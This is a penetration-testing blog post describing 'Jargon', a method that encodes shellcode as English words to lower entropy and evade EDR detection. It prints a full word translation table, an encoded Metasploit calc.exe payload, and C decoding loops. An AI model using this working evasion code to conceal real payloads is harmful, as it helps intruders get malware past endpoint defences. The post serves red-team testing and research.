Obfuscating Shellcode Using Jargon

By Red Siege | July 31, 2023

by Mike Saunders, Principal Security Consultant

In a recent blog , we discussed how encrypting shellcode leads to increased entropy, which may result in your shellcode loader being blocked and/or detected. In this blog, we’ll discuss a new technique for hiding your shellcode and evading entropy checks at the same time.

More entropy check evasion

As we discussed in the previous blog, as testers, we need to obfuscate our shellcode to evade EDRs that measure entropy as a means of determining if an binary is trustworthy. We typically hide our shellcode by encrypting it, which increases entropy. After evading CrowdStrike by compiling in an array of words to lower entropy, I started to contemplate if it were possible to have a shellcode loader that contained no shellcode and didn’t have to load shellcode from an external file or website.

While contemplating how to accomplish this, I started thinking about what shellcode is. Shellcodes are byte sequences that are interpreted as machine code instructions. We typically write shellcode using hex bytes. With the help of friends and the BloodHoundGang Slack, I realized that while we typically write shellcode bytes in hex, we could just as easily write it using ints. Confused? Allow me to explain.

A quick diversion about hex

Hexidecimal, or base-16, is a numbering system that represents four bits of data using one of sixteen possible values: the symbols “0”-“9” and “A”-“F”. A single byte consists of two four-bit values, also known as 8 bits. Since the four-bit values that make up our 8-bit byte can each be represented by one of the sixteen possible symbols, that means that a single byte can is made up of 256 possible values (16 x 16 = 256). We would represent this set of possible values as “00” to “FF”.

There isn’t a magical meaning to using hex. We use it as it’s easier than writing binary strings. To the computer, though, hex is treated as an int. As a result, instead of writing shellcode in hex, we could use the integer values 0 – 255.

Back to your regularly-scheduled programming

As we now know, encryption increases entropy => Entropy can lead to detection => Adding a bunch of words to our payload decreases entropy. How do we use this to our advantage?

We know we typically write shellcode using hex byte sequences, and we know that each byte in a given sequence contains one of only 256 possible values: “00”-“FF”. If we had a set of 256 unique words, we could map each byte value to a specific word: 0x00 to “vision”, 0x01 to “chairs”, and so on. We can put all of our words into a character array and the word’s position in the array represents its value.

unsigned char* translation_table[256] = { "vision","chairs","topics","meditation","piano","moving","terror","kinds","crops","salmon","divide","provinces","appeal","hypothesis","martha","socks","joshua","rabbit","stewart","surfaces","moral","remark","specific","specification","bloggers","escort","enough","personality","induction","arise","homeless","farmers","reasonable","shorter","partners","compensation","earning","execute","gateway","affecting","yours","headphones","zones","genesis","trash","gathered","insight","studied","variations","dispatch","objectives","butterfly","variables","vaccine","sunset","earnings","elections","negotiations","murray","result","renewal","proposed","meets","favor","resume","review","coach","directors","accounting","personalized","started","contracts","readers","fallen","exploring","vampire","findarticles","webpage","sending","bargain","hindu","academics","pentium","intermediate","promise","acres","researcher","picture","sheet","eight","phase","inspector","interests","islands","lifestyle","outlined","logged","toolbox","relation","verify","mambo","shadows","rising","joining","publicity","sympathy","tattoo","sunny","opinions","walking","chicken","retrieval","ghost","groups","struct","womens","mention","interface","terrain","plans","output","shadow","double","consistent","competitions","identifying","newspapers","democrat","compare","postings","understand","marco","ozone","hundred","associate","milwaukee","barbados","hotmail","hoped","closest","financing","shopzilla","cookbook","clinton","bibliographic","troubleshooting","keeps","pilot","worried","wanna","francisco","lewis","tough","extreme","respiratory","measuring","republic","robinson","daisy","louisiana","notion","workout","rehab","graham","leslie","kennedy","posing","google","profession","rider","jenny","against","theories","creative","technique","darwin","roster","samba","organic","russia","redeem","determination","neighbors","occupation","towards","expedia","panic","showtimes","spread","genes","patch","healing","eagles","worcester","adequate","components","riding","utils","yahoo","calcium","sports","ethiopia","iraqi","procurement","diego","liverpool","retired","tunnel","sealed","presentations","holdings","budget","witness","effectively","codes","supplier","disks","collectables","manga","dependent","managers","inherited","occasional","distributions","ratio","worst","while","wikipedia","dublin","assisted","allow","ecommerce","accredited","dating","smith","maximum","suffer","sufficiently","kenneth","prayer","widescreen","oriented","situation","ensuring","trail","prevention","kitty","simulation","domain","corrections","parental","properly","pearl","kevin","every","ethernet" };

Now that we have our translation table, we can iterate over the bytes in our shellcode and do a lookup in our translation table to find the appropriate word. If our shellcode byte is “0x00”, in the above example we’ll look for the word at position 0, which is “vision.” If our byte is “0xFF”, we’ll look in the table and grab the word at the the 256th position, which is “ethernet.” At this point, we’ve translated our shellcode into an array of words. Depending on the size of our shellcode, this can be quite a large array. The following character array is the translated shellcode for a Metasploit windows/x64/exec payload designed to pop calc.exe

const char* translated_shellcode[275] = { "pearl","readers","marco","dublin","widescreen","accredited","eagles","vision","vision","vision","review","academics","review","hindu","pentium","academics","researcher","readers","dispatch","holdings","shadows","readers","closest","pentium","logged","readers","closest","pentium","bloggers","readers","closest","pentium","reasonable","readers","closest","struct","hindu","readers","socks","occupation","exploring","exploring","webpage","dispatch","ethiopia","readers","dispatch","eagles","theories","renewal","toolbox","competitions","topics","trash","reasonable","review","worcester","ethiopia","hypothesis","review","chairs","worcester","while","sufficiently","pentium","review","academics","readers","closest","pentium","reasonable","closest","coach","renewal","readers","chairs","sealed","closest","compare","barbados","vision","vision","vision","readers","hundred","eagles","mention","joining","readers","chairs","sealed","hindu","closest","readers","bloggers","accounting","closest","resume","reasonable","fallen","chairs","sealed","wikipedia","researcher","readers","ethernet","ethiopia","review","closest","variables","barbados","readers","chairs","codes","webpage","dispatch","ethiopia","readers","dispatch","eagles","theories","review","worcester","ethiopia","hypothesis","review","chairs","worcester","elections","ratio","interface","oriented","findarticles","meditation","findarticles","earning","crops","personalized","negotiations","presentations","interface","disks","sheet","accounting","closest","resume","earning","fallen","chairs","sealed","rising","review","closest","appeal","readers","accounting","closest","resume","induction","fallen","chairs","sealed","review","closest","piano","barbados","readers","chairs","sealed","review","sheet","review","sheet","lifestyle","eight","phase","review","sheet","review","eight","review","phase","readers","marco","suffer","reasonable","review","pentium","ethernet","ratio","sheet","review","eight","phase","readers","closest","stewart","dating","picture","ethernet","ethernet","ethernet","islands","readers","panic","chairs","vision","vision","vision","vision","vision","vision","vision","readers","shopzilla","shopzilla","chairs","chairs","vision","vision","review","panic","dispatch","closest","retrieval","milwaukee","ethernet","effectively","showtimes","widescreen","determination","rehab","researcher","review","panic","posing","wanna","genes","robinson","ethernet","effectively","readers","marco","riding","yours","renewal","terror","competitions","divide","compare","properly","ratio","interface","moving","showtimes","contracts","surfaces","struct","retrieval","tattoo","vision","eight","review","hotmail","manga","ethernet","effectively","verify","walking","mambo","insight","shadows","output","shadows","vision" };

We can place our translation table and our translated shellcode in our shellcode loader. We’ll need to use a couple of for loops to translate our shellcode words back into actual shellcode. In the example below, in the outer loop, we iterate over each word in our translated_shellcode character array. In the inner loop, we perform a lookup in our translation table to recover the value. In the example above, the first word is “pearl.” Looking in our translation table, we find pearl is at translation_table[252], so we insert 252 into shellcode[0]. The second word is “readers”. Our lookup will find that this word is at translation_table[72], so we insert a 72 into shellcode[1]. We repeat this process until we’ve completely reconstructed our shellcode.

unsigned char shellcode[275];

for (int sc_index = 0; sc_index <= 275; sc_index++) {
    for (int tt_index = 0; tt_index <= 255; tt_index++)
    {
        if (translation_table[tt_index] == translated_shellcode[sc_index]) {
                shellcode[sc_index] = tt_index;
                break;
        }
    }
}

Putting it all together

I’ve released Jargon, a generator written in Python. Jargon will translate raw shellcode and generate a stub that can be plugged into your favorite C shellcode loader. A constructed Jargon payload will not contain any “shellcode bytes” as we typically think of them. Because we’re using words to represent the shellcode, we also decrease the entropy in our payload and evade entropy checks. in the example below, I used Jargon to obfuscate a Cobalt Strike beacon.

Detection

For the defenders, I’m not sure there’s an easy way to detect the use of Jargon obfuscation. It might be possible to determine the nature of the character arrays through frequency analysis, but this is outside my wheelhouse.

Conclusion

There are many ways to obfuscate shellcode and also reduce entropy. Jargon demonstrates one of them. While it does help solve the entropy detection problem, it does not simply lead to an EDR bypass. You will still need to use evasive methods to copy the reconstructed shellcode into memory and execute it.

Credits

I am not the first person to come up with this technique. I did quite a bit of searching and I couldn’t find any examples of prior art, although I did find others using this technique during my research. As far as I know, when I originally wrote Jargon, I was the first person to publish code for it. There are examples of prior art using the English language for shellcode, but in a different manner, such as Mason et al., CCS, 2009. There is also the work of Hadrien Barral and Georges-Axel Jaloyan, presented at Defcon 30, in which they use Emoji to represent shellcode. Many thanks to Charlie Clark for pointing me to Vincent Dary’s PolyAsciiShellGen project, which demonstrates another method of shellcode obfuscation, this time using the printable ASCII character set.

Extra Credit

You may have already figured this out, but it’s possible to do this without even using a decimal value. We can access arrays using either a integer value, or a hex value. Therefore, we could rewrite our for loop as follows:

unsigned char shellcode[275];
for (int sc_index = 0x00; sc_index <= 0x0113; sc_index++) {
    for (int tt_index = 0x00; tt_index <= 0xFF; tt_index++)
    {
        if (translation_table[tt_index] == translated_shellcode[sc_index]) {
                shellcode[sc_index] = tt_index;
                break;
        }
    }
}

 

About Principal Security Consultant Mike Saunders

Mike Saunders is Red Siege Information Security’s Principal Consultant. Mike has over 25 years of IT and security expertise, having worked in the ISP, banking, insurance, and agriculture businesses. Mike gained knowledge in a range of roles throughout his career, including system and network administration, development, and security architecture. Mike is a highly regarded and experienced international speaker with notable cybersecurity talks at conferences such as DerbyCon, Circle City Con, SANS Enterprise Summit, and NorthSec, in addition to having more than a decade of experience as a penetration tester. You can find Mike’s in-depth technical blogs and tool releases online and learn from his several offensive and defensive-focused SiegeCasts. He has been a member of the NCCCDC Red Team on several occasions and is the Lead Red Team Operator for Red Siege Information Security.

Certifications:
GCIH, GPEN, GWAPT, GMOB, CISSP, and OSCP

Connect on Twitter & LinkedIn

Adventures in Shellcode Obfuscation! Part 1: Overview

By Red Siege | June 17, 2024

by Mike Saunders, Principal Security Consultant This blog is the first in a series of articles on methods for obfuscating shellcode. I’ll be focusing on how to obfuscate shellcode to […]

Learn More
Adventures in Shellcode Obfuscation! Part 1: Overview

Essential Steps for Management to Maximize the Value of a Penetration Test Report

By Red Siege | June 3, 2024

by Tim Medin, CEO Penetration testing is a critical component of a well-rounded cybersecurity strategy. Penetration testing identifies vulnerabilities before malicious actors can exploit them. However, the true value of […]

Learn More
Essential Steps for Management to Maximize the Value of a Penetration Test Report

Fun With JWT X5u

By Red Siege | May 30, 2024

by Senior Security Consultant Douglas Berdeaux On a recent web application penetration test engagement, I came across a JSON Web Token (JWT) that contained an x5u header parameter. I almost […]

Learn More
Fun With JWT X5u

Find Out What’s Next

Stay in the loop with our upcoming events.